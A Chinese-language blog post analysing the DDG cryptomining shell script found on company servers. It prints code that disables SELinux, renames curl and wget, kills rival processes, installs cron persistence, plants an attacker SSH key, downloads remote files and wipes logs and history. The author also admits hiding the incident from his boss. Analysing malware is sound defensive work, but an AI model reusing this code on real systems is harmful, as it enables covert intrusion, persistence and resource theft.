一個「挖礦腳本」還能可貴住我？

公司有幾臺機器，最近 CPU 一直在瘋轉，就像是吃了藥，一直在發熱。因爲機器實在是太多，有這麼幾臺安全性防禦沒有到位，就一直躺在角落裏瘋狂運轉。

圖片來自 Pexels

直到統一的監控腳本接管了這幾臺機器，異常狀況才得以浮出水面。最後發現了多個奇奇怪怪的進程，發現是一個挖礦腳本。

下載下來學習了一下，發現腳本的編寫者，有着較高的水平。雖然在別人機器進行挖礦行爲是不道德的，但掩蓋不了腳本編寫者的風騷操做。

挖礦，是計算機技術界最讓人迷惑的行爲之一，但它賺錢。據悉，這段腳本名叫 DDG，已經挖取了價值一千多萬人民幣的虛擬幣貨幣。

本着學習的目的，我稍微分析了一下這個神奇的腳本，也算是吸盡它的精華，爲我所用。

這事我都沒敢告訴老闆，由於說了他也不懂，反生事端。不過和你們交流一下仍是能夠的，由於大家懂啊。

01

Code 1

#!/bin/sh

腳本的第一行，看起來是一行註釋，但其實並非。它規定了接下來的腳本，將要採用哪個 SHELL 執行。

像咱們日常用的 bash、zsh 等，屬於 sh 的超集，這個腳本使用 sh 做爲執行的 shell，具備更好的可移植性。

02

Code 2

setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

setenforce 是 Linux 的 selinux 防火牆配置命令，執行 setenforce 0 表示關閉 selinux 防火牆。2 表明的是標準錯誤（stderr）的意思。

因此後面，使用重定向符，將命令的錯誤輸出定向到 /dev/null 設備中。這個設備是一個虛擬設備，意思是什麼都不幹。很是適合靜悄悄的幹壞事。

03

Code 3

sync && echo 3 >/proc/sys/vm/drop_caches

腳本貼心的幫咱們釋放了一些內存資源，以便獲取更多的資源進行挖礦。

衆所周知，Linux 系統會隨着長時間的運行，會產生不少緩存，清理方式就是寫一個數字到 drop_caches 文件裏，這個數字一般爲 3。

sync 命令將全部未寫的系統緩衝區寫到磁盤中，執行以後就能夠放心的釋放緩存了。

04

Code 4

crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/sysupdates
rtdir="/etc/sysupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cur"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wge"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/xget /usr/bin/get
mv /usr/bin/get /usr/bin/wge
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/xurl /usr/bin/url
mv /usr/bin/url /usr/bin/cur

沒錯，上面這些語句就是完成了一些普通的操做。值得注意的是，它把咱們的一些經常使用命令，使用 mv 命令給重名了。

這在執行命令的時候，就會顯得分紅功能的蛋疼。這腳本已經更改了計算機的一些文件，屬於犯罪的範疇了。

腳本爲了複用一些功能，抽象出了不少的函數。咱們直接跳到 main 函數的執行，而後看一下這個過程。

05

Code 5

首先是 kill_miner_proc 函數。代碼很長，就不所有貼出來了。

kill_miner_proc()
{
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
  ...
    pkill -f biosetjenkins
    pkill -f Loopback
    ...
    crontab -r
    rm -rf /var/spool/cron/*

挖礦領域是一個相愛相殺的領域。這個方法首先使用 ps、grep、kill 一套組合，幹掉了同行的挖礦腳本，而後停掉了同行的 cron 腳本，黑吃黑的感受。

在這段腳本里，使用了 pkill 命令。這個命令會終止進程，並按終端號踢出用戶，比較暴力。

06

Code 6

接下來執行的是 kill_sus_proc 函數。

ps axf -o "pid"|while read procid
do
...
done

ps 加上 o 參數，能夠指定要輸出的列，在這裏只輸出的進程的 pid，而後使用 read 函數，對 procid 進行遍歷操做。

07

Code 7

ls -l /proc/$procid/exe | grep /tmp
if [ $? -ne 1 ]
then
...
fi

上面就是遍歷操做過程了，咱們能夠看到 if 語句的語法。其中 $? 指的是上一個命令的退出狀態。

0 表示沒有錯誤，其餘任何值代表有錯誤。-ne 是不等於的意思，意思就是可以匹配到 tmp 這個字符串。

08

Code 8

ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
do
...
done

呵呵，上面又來了一次循環遍歷。不過此次針對的目標，是 CPU 使用超過 40% 的進程。這就有點狠了：影響我挖礦的進程，都得死！相煎何太急。

09

Code 9

再接下來，腳本針對不一樣的用戶屬性，進行了不一樣的操做。

首先是 root 用戶。經過判斷是否存在 $rtdir 文件，來肯定是不是 root 權限。

chattr -i /etc/sysupdate*
chattr -i /etc/config.json*
chattr -i /etc/update.sh*
chattr -i /root/.ssh/authorized_keys*
chattr -i /etc/networkservice

使用 chattr 命令，把一些重要的文件，搞成不能任意改動的只讀屬性，也是夠損的。而後，操做 cron 程序，把腳本的更新服務加入到定時中。

就是下面這段腳本。

10

Code 10

if [ ! -f "/usr/bin/crontab" ]
then
    echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir}
else
    [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -
fi

注意 [[ $cont =~ "update.sh" ]] 這以小段代碼，怪異的很。[[ ]] 是 shell 中內置的一個命令，支持字符串的模式匹配。

使用 =~ 的時候，甚至支持 shell 的正則表達式，強大的使人髮指。它的輸出結果是一個 bool 類型，因此可以使用||進行拼接。

然後面的單小括號 ()，是的是一個命令組，括號中多個命令之間用分號隔開，最後一個命令能夠沒有分號；和 `cmd` 的效果基本是同樣的。

11

Code 11

搞完了定時任務，就要配置 ssh 自動登陸了，經過把公鑰追加到信任列表中就能夠。

chmod 700 /root/.ssh/
echo >> /root/.ssh/authorized_keys
chmod 600 root/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/                                                       oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+                                                                                                 4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+                  Kl2yXiHN5oD9BVTkdIWX root@u17" >> /root/.ssh/authorized_keys    

12

Code 12

說曹操曹操就到，下面的腳本就使用了 `` 進行操做。

filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`
if [ "$filesize_config" -ne "$config_size" ]
then
    pkill -f sysupdate
    rm /etc/config.json
    downloads $config_url /etc/config.json $config_url_backup
else
    echo "no need download"
fi   

經過一系列騷操做，獲取到配置文件的大小，若是判斷文件大小不一致，那麼就從新下載一個。這就用到了 downloads 函數。

shell 中的函數，看起來比較怪異，後面的參數傳遞，就像是腳本傳遞同樣，傳送給函數。

13

Code 13

downloads $config_url /etc/config.json $config_url_backup

這句話，就傳遞了三個參數。 固然，文件要從遙遠的服務器上下載。域名是 .de 結尾的，證實是個德國的域名，其餘的咱們一無所知。

downloads()
{
    if [ -f "/usr/bin/curl" ]
    then
    echo $1,$2
        http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        else
            curl --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/cur" ]
    then
        http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        else
            cur --connect-timeout 10 --retry 100 $3 > $2
fi
    elif [ -f "/usr/bin/wget" ]
    then
        wget --timeout=10 --tries=100 -O $2 $1
        if [ $? -ne 0 ]
    then
        wget --timeout=10 --tries=100 -O $2 $3
        fi
    elif [ -f "/usr/bin/wge" ]
    then
        wge --timeout=10 --tries=100 -O $2 $1
        if [ $? -eq 0 ]
        then
            wge --timeout=10 --tries=100 -O $2 $3
        fi
    fi
}

我認爲，這段代碼做者寫的又臭又長，徹底沒有體現出本身應有的水平。應該是趕工期，沒有想好代碼的複用，纔會寫的這麼有失水準。

咱們上面說到，腳本改了幾個命令的名字，其中就有 curl。這個命令是如此的強大，以致於腳本的做者都忍不住加了很多參數：

• -I：用來測試 http 頭信息。

• -m：設置最大傳輸時間。

• -o：指定保持的文件名。這裏是 /dev/null，呃呃呃......

• -s：靜默模式，不輸出任何東西。

• --connect-timeout：鏈接超時時間。

• --retry：重試次數，好狠，100 次。

若是沒有 curl？那就使用替補的 wget，套路都是同樣的。

14

Code 14

接下來是一系列類似的操做，最後，對 iptables 一批操做。

iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -I INPUT -s 43.245.222.57 -j DROP
service iptables reload

15

Code 15

細心的腳本編寫者，還使用命令清理了操做日誌。

history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history

不露死角，瀟灑走開。能夠看到，且不說真正的挖礦程序，僅僅是這個小腳本，做者也下足了功夫。

腳本里命令繁多，使用方式多樣，縮緊格式優雅，除了有一點囉嗦，沒有加密以外，是一個很是好的拿來學習的腳本。

瞧了瞧被控制的機器，我趕忙偷偷的重裝了機器。就當它是一個夢吧。老闆問起的時候，什麼都沒有發生過。